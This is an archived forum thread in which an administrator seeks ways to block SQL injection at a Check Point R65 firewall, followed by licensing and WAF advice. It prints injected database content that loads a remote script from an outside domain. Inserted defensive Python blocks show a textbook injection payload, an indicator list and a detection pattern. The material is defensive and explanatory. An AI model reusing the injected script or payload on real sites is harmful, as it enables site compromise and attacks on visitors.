SQL Injection Attack - How to stop it at the R65 firewall?



Spacetrucker
2009-08-13, 19:19
All - R65 HFA 2, I need to deal with an apparent SQL injection attack; below is the code. I just found out that while Web Intelligence is listed in Smart Defense, you need a license for it. Anyway, is there a way I can cut SQL injection attacks off at the firewall?

112 27010 Netherlands Antilles<script src=http://n.uc8010.com/0.js></script> 0 NULL <script src=http://n.uc8010.com/0.js></script> 112 40 Europe<script src=http://n.uc8010.com/0.js></script> NULL NULL NULL 0 0 0 0 0 0 <script src=http://n.uc8010.com/0.js></script> NULL NULL 2002-07-01 16:04:07.000

Thanks

belvdr
2009-08-14, 11:11
From talking with my rep, Web Intelligence does not require a license for the SQL Injection prevention. Apparently, there's a web intelligence product for web servers that requires a license.

Have you tried enabling it and does it block it?

Spacetrucker
2009-08-14, 15:39
From talking with my rep, Web Intelligence does not require a license for the SQL Injection prevention. Apparently, there's a web intelligence product for web servers that requires a license.

Have you tried enabling it and does it block it?

Your rep is correct, along with lammbo from my other post. Without the WI license it's an all or nothing proposition. I did try enabling the Smart Defense -> Web Intelligence -> Application Layer -> SQL Injection defense against all the web sites, and I was able to. For political reasons, I can't enforce it against all the web sites at the same time. I'll have to do this in ones and twos and see what breaks.

Spacetrucker
2009-10-06, 15:22
I'm back, after learning the hard way this past weekend. We had a sql db get hacked by an sql injection attack. I thought it was protected because I had defined the server that hosts the web front end as a web server on the gateway, and I was running Web Intelligence, with the sql injection protection set to high.

It's a drag to come clean, but the fault lies with me. And maybe my mistake will help someone else avoid it.

It's simple my pen testing was f#cked up. I ran exploit code I found on the web against the site rather than the server. If I had run it against the server the vulnerability would have been exposed.

So here's what I did after getting hacked, and thinking WTF happened.

Here's our setup. We have an IIS 6 web server that hosts 40 sites. Each site has its own IP address (we don't use host headers). Each site is defined as a host on the gateway, using one-to-one static NAT.

First I checked the settings on the gateway to make sure of what they were.

Remember I've already defined the server hosting the sites as a web server on the gateway.

So now I defined a site as a web server on the gateway. This particular site resides on a different server.

I ran the sql injection code that we got hacked with, against the server that's defined as a web server again and it succeeded again :(

I ran the same code against the site that's defined as a web server, and it was detected by WI, and the connection was reset, an entry was written to the log file, and I got an email from the gateway :)

My Check Point reseller tells me the license is per server and not per site.
The WI license comes in three flavors, you can cover 3 servers or 10, or unlimited.

I did explain how we're setup to the reseller. And that I was confused by the licensing, was it per server or per site?

I think the question I should have asked my Check Point reseller is "How many ip addresses are covered by the WI license?"

Now I know that WI is based on the ip address.

I've read a few less than favorable comments about SD and WI. And I understand that writing secure code is a requirement.

So if you're not using SD and WI, how does your shop protect itself against these types of exploits?

Thorpuse
2009-10-07, 02:47
Buy WI off the Blades Pricelist - the concept of the number of servers disappears then, AND it's much, much cheaper.

One for the gallery though - I can't see how WI would work and be kept up to date WITHOUT an IPS Blade subscription license, as WI relies on the protections in the IPS blade. Blade Independence? Hmmm... I wonder....

fwwidgit
2009-10-07, 09:21
Re your question about how to stop such attacks - it's unfortunately quite simple - and not so simple at the same time.

Input validation for all SQL statements on the web server applications.

SD / IPS is just a defence mechanism - your applications need to have their own internal defenses as well.

Easy statement to make - not so easy to resolve.

Other thoughts on this though are to ensure that you're providing as little information as possible to your potential attackers. If you let them know you're running IIS (and therefore probably MSSQL in the back) you've put a nice big target on your site. Not entirely familiar with IIS - but I'm assuming you can hide all the web server product information and database info so it becomes a generic system type.
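Input validation is one half of what fwwidgit describes; the other half is never letting request data become part of the SQL statement text. The following is an added example, not code from the post or from any of the products discussed in the thread: it uses Python's sqlite3 module (standing in for the IIS/MSSQL stack the original poster runs) to show a string-built query beside a parameterized one, plus an allow-list check of the kind fwwidgit calls for. The table, its rows, the product id values and the payload string are all constructed for the demonstration.

```python
import sqlite3


def build_db():
    # Constructed sample table standing in for the site's database.
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, description TEXT)"
    )
    conn.executemany(
        "INSERT INTO products (name, description) VALUES (?, ?)",
        [("Widget", "Standard widget"), ("Gadget", "Deluxe gadget")],
    )
    conn.commit()
    return conn


def lookup_vulnerable(conn, product_id):
    # The request parameter is pasted into the statement text. The quotes the
    # application writes around it are the only thing separating data from SQL,
    # so a value that itself contains a quote rewrites the WHERE clause.
    sql = "SELECT name, description FROM products WHERE id = '%s'" % product_id
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, product_id):
    # The value is bound to a placeholder and handed to the engine separately
    # from the statement, so it is never parsed as SQL whatever it contains.
    sql = "SELECT name, description FROM products WHERE id = ?"
    return conn.execute(sql, (product_id,)).fetchall()


def validate_product_id(value):
    # Allow-list input validation, applied before the query as defence in depth:
    # a product id is a run of decimal digits and nothing else.
    if not isinstance(value, str) or not value.isdigit():
        raise ValueError("product id must be a string of digits")
    return int(value)


def is_valid_product_id(value):
    # Boolean wrapper around validate_product_id for callers that just want a verdict.
    try:
        validate_product_id(value)
        return True
    except ValueError:
        return False


def lookup_safe(conn, raw_value):
    # Validation first, then a parameterized query. Either layer alone stops the
    # classic quote-based injection; together they also reject junk input early.
    return lookup_parameterized(conn, validate_product_id(raw_value))


if __name__ == "__main__":
    db = build_db()
    honest = "1"
    hostile = "1' OR '1'='1"  # textbook payload, constructed for the demo
    print("vulnerable, honest input: ", lookup_vulnerable(db, honest))
    print("vulnerable, hostile input:", lookup_vulnerable(db, hostile))  # every row leaks
    print("parameterized, hostile:   ", lookup_parameterized(db, hostile))  # no rows
    try:
        lookup_safe(db, hostile)
    except ValueError as exc:
        print("validation rejected input:", exc)
```

The same split applies on the IIS/MSSQL side: the fix is parameterized commands (or stored procedures called with bound parameters) in the application code, not a pattern on the firewall, which is exactly why the gateway could be bypassed when the request was sent to an address it was not inspecting.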

Spacetrucker
2009-10-07, 14:22
Buy WI off the Blades Pricelist - the concept of the number of servers disappears then, AND it's much, much cheaper.

One for the gallery though - I can't see how WI would work and be kept up to date WITHOUT an IPS Blade subscription license, as WI relies on the protections in the IPS blade. Blade Independence? Hmmm... I wonder....

Wouldn't I need to upgrade to the Blades version?



Re your question about how to stop such attacks - it's unfortunately quite simple - and not so simple at the same time.

Input validation for all SQL statements on the web server applications.

SD / IPS is just a defence mechanism - your applications need to have their own internal defenses as well.

Easy statement to make - not so easy to resolve.

Other thoughts on this though are to ensure that you're providing as little information as possible to your potential attackers. If you let them know you're running IIS (and therefore probably MSSQL in the back) you've put a nice big target on your site. Not entirely familiar with IIS - but I'm assuming you can hide all the web server product information and database info so it becomes a generic system type.

I agree, it starts with the code. Regarding information to potential attackers, my bad, I know better.

dsb.nepo
2009-10-07, 17:45
I don't know which platforms your web servers are but I see some solutions.

For apache look into ModSecurity: Open Source Web Application Firewall (http://www.modsecurity.org/)
For IIS search for urlscan; there is also a new version 3.x for IIS7

You can try to extend SmartDefense under 'Web Intelligence' -> 'Malicious Code' -> 'General HTTP Worm catcher'
- add a rule like /suc8010.com/

If the request has a specific user agent you can filter on that.

For high volume websites I don't recommend SmartDefense, for low volume it is OK but has many false positives (example: corrupt gif/png detection).
To protect clients behind the FW it is OK, even with some false positives.

Spacetrucker
2009-10-07, 22:40
I don't know which platforms your web servers are but I see some solutions.

For apache look into ModSecurity: Open Source Web Application Firewall (http://www.modsecurity.org/)
For IIS search for urlscan; there is also a new version 3.x for IIS7

You can try to extend SmartDefense under 'Web Intelligence' -> 'Malicious Code' -> 'General HTTP Worm catcher'
- add a rule like /suc8010.com/

If the request has a specific user agent you can filter on that.

For high volume websites I don't recommend SmartDefense, for low volume it is OK but has many false positives (example: corrupt gif/png detection).
To protect clients behind the FW it is OK, even with some false positives.

Have you used urlscan? What I've read hasn't been real positive.
How many hits does a site have to take to be considered high volume?

Thorpuse
2009-10-07, 23:31
Wouldn't I need to upgrade to the Blades version?


Fair point - you'd need to be running R70, but the cost differential should make it cheaper for you to run this way.

Web App Firewalls isn't an area I've had a lot of direct exposure to, but Imperva is a company that often comes up in that area - might be worth looking into them if this is a key requirement.

Spacetrucker
2009-10-08, 11:59
Fair point - you'd need to be running R70, but the cost differential should make it cheaper for you to run this way.

Web App Firewalls isn't an area I've had a lot of direct exposure to, but Imperva is a company that often comes up in that area - might be worth looking into them if this is a key requirement.

I'm asking because I don't know. Thanks for the tip on Imperva, I'll check that out.

Spacetrucker
2009-10-09, 17:37
Fair point - you'd need to be running R70, but the cost differential should make it cheaper for you to run this way.

Web App Firewalls isn't an area I've had a lot of direct exposure to, but Imperva is a company that often comes up in that area - might be worth looking into them if this is a key requirement.

I've read that 130 count post in Licensing about R70.
boldin writes you have two upgrade options, upgrade to R70 using your existing NGX licenses, or upgrade to the R70 Blades Architecture.
So it appears there are two versions of R70. So would either one of these versions do the trick of eliminating how many servers would be covered by the WI license?

I have an eval license applied right now to test WI, and for us it seems to be working well at blocking a load of stuff besides sql injection.

Thorpuse
2009-10-09, 21:08
I've read that 130 count post in Licensing about R70.
boldin writes you have two upgrade options, upgrade to R70 using your existing NGX licenses, or upgrade to the R70 Blades Architecture.
So it appears there are two versions of R70. So would either one of these versions do the trick of eliminating how many servers would be covered by the WI license?

I have an eval license applied right now to test WI, and for us it seems to be working well at blocking a load of stuff besides sql injection.

There are not two "versions", there are two licensing schemes. The functionality on old and new licenses is the same. The difference is commercial, not technical - get your reseller/disti/CP rep to quote up the upgrade (you get 100% credit on existing licenses until 31 December!) and you should see that commercially, you save money on the Blades licensing with WI included. Incidentally, if this option does turn out to be more expensive, I'd be very curious to see the details, as WI is used in just about every case study CP uses to prove that allegedly, the Blades pricing is better for customers. It would be brilliant to see a case where even using their best case product scenario that it isn't....

I'm not bitter, just tired of explaining to my customers that they have to pay more for exactly the same as what they've already got, as well as the new "features" which they have no choice but to buy....

RayPesek
2009-10-09, 21:58
Check out Protect Your Website From Hacker Attacks With dotDefender | Applicure Technologies (http://www.applicure.com) as well. Personally, I think ModSecurity with their core rule set works quite well. If this is an SSL site, you can set up ModSecurity as a reverse proxy and have the SSL decryption done on it.

Ray

Spacetrucker
2009-10-12, 17:58
There are not two "versions", there are two licensing schemes. The functionality on old and new licenses is the same. The difference is commercial, not technical - get your reseller/disti/CP rep to quote up the upgrade (you get 100% credit on existing licenses until 31 December!) and you should see that commercially, you save money on the Blades licensing with WI included. Incidentally, if this option does turn out to be more expensive, I'd be very curious to see the details, as WI is used in just about every case study CP uses to prove that allegedly, the Blades pricing is better for customers. It would be brilliant to see a case where even using their best case product scenario that it isn't....

I'm not bitter, just tired of explaining to my customers that they have to pay more for exactly the same as what they've already got, as well as the new "features" which they have no choice but to buy....

Thanks for squaring me away on the point that it's two different licenses and not two different versions. I just got a quote on the upgrade to the blades technology. And, I've emailed the reseller asking if the WI license with coverage for an unlimited number of servers is included in that quote.



Check out Protect Your Website From Hacker Attacks With dotDefender | Applicure Technologies (http://www.applicure.com) as well. Personally, I think ModSecurity with their core rule set works quite well. If this is an SSL site, you can set up ModSecurity as a reverse proxy and have the SSL decryption done on it.

Ray

Ray thanks a bunch, this looks pretty good. The pricing is around $3000 per server for 3 - 5, and that's a perpetual license. Have you used this product? Are there any downsides, other than the company ceasing to exist?

Spacetrucker
2009-10-12, 18:46
Buy WI off the Blades Pricelist - the concept of the number of servers disappears then, AND it's much, much cheaper.

One for the gallery though - I can't see how WI would work and be kept up to date WITHOUT an IPS Blade subscription license, as WI relies on the protections in the IPS blade. Blade Independence? Hmmm... I wonder....


There are not two "versions", there are two licensing schemes. The functionality on old and new licenses is the same. The difference is commercial, not technical - get your reseller/disti/CP rep to quote up the upgrade (you get 100% credit on existing licenses until 31 December!) and you should see that commercially, you save money on the Blades licensing with WI included. Incidentally, if this option does turn out to be more expensive, I'd be very curious to see the details, as WI is used in just about every case study CP uses to prove that allegedly, the Blades pricing is better for customers. It would be brilliant to see a case where even using their best case product scenario that it isn't....

I'm not bitter, just tired of explaining to my customers that they have to pay more for exactly the same as what they've already got, as well as the new "features" which they have no choice but to buy....

My reseller emailed me back, and says that the WI license is in addition to the R70 Blades technology license. My bad, I think I'm misunderstanding what you're telling me. You're saying you're still going to have to pay for a WI license even if you upgrade to the R70 Blades technology, it's just cheaper coming off the Blades price list. Is it ok to list the prices from your reseller's quotes in the forum, or is that a breach of etiquette?

Thorpuse
2009-10-12, 18:59
My reseller emailed me back, and says that the WI license is in addition to the R70 Blades technology license. My bad, I think I'm misunderstanding what you're telling me. You're saying you're still going to have to pay for a WI license even if you upgrade to the R70 Blades technology, it's just cheaper coming off the Blades price list. Is it ok to list the prices from your reseller's quotes in the forum, or is that a breach of etiquette?

WI on the Blades Price list will cost list $1500 for unlimited web servers. On the NGX price list it will be >$1500, and will cost more depending on the number of web servers defined. The thing you have to factor in is the cost of conversion of your other products to blades, which, in every case I've worked on so far, has not been economical without special NSP assistance. Hope this clarifies it.

Biggest thing to understand is that today, this is *purely* a commercial decision. However, I expect that sometime next year once they retire the NGX pricelist that technical limitations will start to kick in - this has already been forecasted for the IPS blade, and I won't be surprised to see it elsewhere, the way that CP is acting at the moment.

RayPesek
2009-10-12, 19:17
We haven't used it yet but are about to begin an eval. It was recommended by a local PCI Qualified Security Assessor. Their success rate for breaking into companies from the Internet is currently at 73% and some of these are very large companies.

Check out some of their scary free tools: https://www.securestate.com/Pages/Free-Tools.aspx If you're familiar with Back Track, they produced and gave away the entire section under Penetration Testing named Fast-Track.

Also note that Web Intelligence generates a LOT of false positives. Simply using words like "control" in a post will generate a block. You really need to go through the words it keys on and get rid of any that might be used in your web traffic.

Ray
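dsb.nepo's worm-catcher rule and RayPesek's warning about the word "control" come down to the same question: what does the signature actually match on? The following is an added example, not code from the thread or from SmartDefense/Web Intelligence: a small Python scanner over constructed request lines that compares three detectors, an indicator match on the domain visible in the first post's injected content, a structural pattern for a script element with a remote src, and a bare keyword list of the kind that trips on ordinary English. The request lines, the keyword list and the host evil.example are constructed for the demonstration; only the n.uc8010.com domain comes from the thread.

```python
import re

# Constructed sample request lines (not from the original post): URL-decoded
# paths with query strings, as they might appear in a web server log.
SAMPLE_REQUESTS = [
    "/products.asp?id=12",
    "/guestbook.asp?msg=I lost control of my budget this month",
    "/guestbook.asp?msg=<script src=http://n.uc8010.com/0.js></script>",
    "/search.asp?q=<script src=http://evil.example/x.js></script>",
    "/news.asp?title=Software update available",
]

# Indexes of the lines above that really carry injected content.
KNOWN_BAD = [2, 3]

# Indicator taken from the injected content shown in the thread's first post.
IOC_DOMAINS = ["n.uc8010.com"]

# Structural pattern: a script element whose src attribute points at an
# external host. Matches the shape of the injection, not individual words.
REMOTE_SCRIPT_TAG = re.compile(
    r"<script\b[^>]*\bsrc\s*=\s*['\"]?https?://", re.IGNORECASE
)

# Stand-in for a signature list that keys on bare words; "control" is the
# word RayPesek reports as a false-positive trigger on normal posts.
NAIVE_KEYWORDS = ["control", "script", "update"]


def match_ioc(line):
    # Exact indicator match: precise, but only catches this one campaign.
    lower = line.lower()
    return any(domain in lower for domain in IOC_DOMAINS)


def match_structural(line):
    # Pattern match on the injected element itself, independent of the host.
    return REMOTE_SCRIPT_TAG.search(line) is not None


def match_keywords(line, keywords):
    # Bare substring match on words; cheap, and prone to flagging plain text.
    lower = line.lower()
    return any(word in lower for word in keywords)


def scan(requests, keywords=NAIVE_KEYWORDS):
    """Return, per detector, the indexes of the request lines it flags."""
    return {
        "ioc_domain": [i for i, r in enumerate(requests) if match_ioc(r)],
        "remote_script_tag": [i for i, r in enumerate(requests) if match_structural(r)],
        "naive_keywords": [i for i, r in enumerate(requests) if match_keywords(r, keywords)],
    }


def false_positives(flagged, known_bad=KNOWN_BAD):
    """Flagged lines that are not in the known-bad set."""
    return sorted(set(flagged) - set(known_bad))


if __name__ == "__main__":
    results = scan(SAMPLE_REQUESTS)
    for name, hits in results.items():
        print(f"{name:18s} flagged {hits}  false positives {false_positives(hits)}")
    # Tuning the word list the way RayPesek suggests removes one false
    # positive but leaves another; the structural pattern has none.
    tuned = scan(SAMPLE_REQUESTS, ["script", "update"])["naive_keywords"]
    print("tuned keywords     flagged", tuned, " false positives", false_positives(tuned))
```

Run against the sample, the keyword detector flags the budget comment and the software news item alongside the two real hits, dropping "control" from the list still leaves the "update" false positive, and the structural pattern flags exactly the two injected lines. The lesson for a worm-catcher rule is to match the injected structure (a script element with an external src) rather than a word that legitimate traffic will also contain.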

Spacetrucker
2009-10-13, 16:22
WI on the Blades Price list will cost list $1500 for unlimited web servers. On the NGX price list it will be >$1500, and will cost more depending on the number of web servers defined. The thing you have to factor in is the cost of conversion of your other products to blades, which, in every case I've worked on so far, has not been economical without special NSP assistance. Hope this clarifies it.

Biggest thing to understand is that today, this is *purely* a commercial decision. However, I expect that sometime next year once they retire the NGX pricelist that technical limitations will start to kick in - this has already been forecasted for the IPS blade, and I won't be surprised to see it elsewhere, the way that CP is acting at the moment.

I've been checking out the price lists and I need some help with translating the names of the products that I currently have to the new names.

I'm trying to factor in our other products.

We've got a single R65 SPLAT NGX with the enforcement and management modules on the same box, unlimited users. When I run sysconfig - option 10 - Products Installed. I see VPN-1 Power and SmartCenter installed.

I think this translates to the section titled Check Point SmartCenter and VPN-1 Gateway Bundles - Power Series Column - VPN-1 Power and SmartCenter Power in the NGX pricelist.

We've got a Smart Defense license, I don't think this product's name has changed.

And we've got a 25 user SecureClient license, what's this translate to now? A search of the price list finds SecureClient mentioned in the Connectra, and a mention of Endpoint security.

northlandboy
2009-10-13, 16:49
I think this translates to the section titled Check Point SmartCenter and VPN-1 Gateway Bundles - Power Series Column - VPN-1 Power and SmartCenter Power in the NGX pricelist.

We've got a Smart Defense license, I don't think this product's name has changed.

And we've got a 25 user SecureClient license, what's this translate to now? A search of the price list finds SecureClient mentioned in the Connectra, and a mention of Endpoint security.

Best bet is to talk to a reseller about this - it gets complicated.

SmartDefense is now IPS.

SecureClient is going away - support ends at the end of next year I think.

Thorpuse
2009-10-13, 16:49
Welcome to the joys of Blades... :)

SmartDefense translates to the IPS blade. SecureClient hasn't been converted to an equivalent Blades license, so that one stays as it is for this week.

There are a number of SKUs for combined Management/Gateways, one of these should be equivalent, although the Multicore and Unlimited reinterpretations will probably show you the stickershock factor. This is usually the moment when calling your friendly CP sales rep comes in handy, if only so you can ask them to explain why you'll have to pay that much to get the same if not less functionality....

Spacetrucker
2009-10-13, 17:15
We haven't used it yet but are about to begin an eval. It was recommended by a local PCI Qualified Security Assessor. Their success rate for breaking into companies from the Internet is currently at 73% and some of these are very large companies.

Check out some of their scary free tools: https://www.securestate.com/Pages/Free-Tools.aspx If you're familiar with Back Track, they produced and gave away the entire section under Penetration Testing named Fast-Track.

Also note that Web Intelligence generates a LOT of false positives. Simply using words like "control" in a post will generate a block. You really need to go through the words it keys on and get rid of any that might be used in your web traffic.

Ray

Ray thanks for the link, these tools look like they could be fun, used responsibly of course.


Best bet is to talk to a reseller about this - it gets complicated.

SmartDefense is now IPS.

SecureClient is going away - support ends at the end of next year I think.

What are they replacing SecureClient with?
I'm talking to my reseller, trying to ask questions the right way, which can be a stretch for me at times ;)

Thorpuse
2009-10-13, 17:35
What are they replacing SecureClient with?
I'm talking to my reseller, trying to ask questions the right way, which can be a stretch for me at times ;)

Product-wise, SC is being replaced by a thing called Endpoint Connect. It's been discussed on here before.

Licensing-wise, the SecureAccess license on the NGX pricelist is the current remote access license. Your reseller will need to quote this, but you can quote it for any number of users, which is an improvement on the fixed numbers for SC licenses. You should also get 100% credit for this, so the pricing should be reasonable. Note that you don't have to upgrade that license (yet...).

Spacetrucker
2009-10-14, 11:45
Product-wise, SC is being replaced by a thing called Endpoint Connect. It's been discussed on here before.

Licensing-wise, the SecureAccess license on the NGX pricelist is the current remote access license. Your reseller will need to quote this, but you can quote it for any number of users, which is an improvement on the fixed numbers for SC licenses. You should also get 100% credit for this, so the pricing should be reasonable. Note that you don't have to upgrade that license (yet...).

I printed out the price list and spoke to my reseller. The initial quote is for the SMU007/SG805 because our current license is for an unlimited number of gateways and users. I suggested that the SM1003/SG405 may be a better fit for us.

He explained that Check Point may not give us a 100% credit for that bundle because it's a downgrade from what we already have.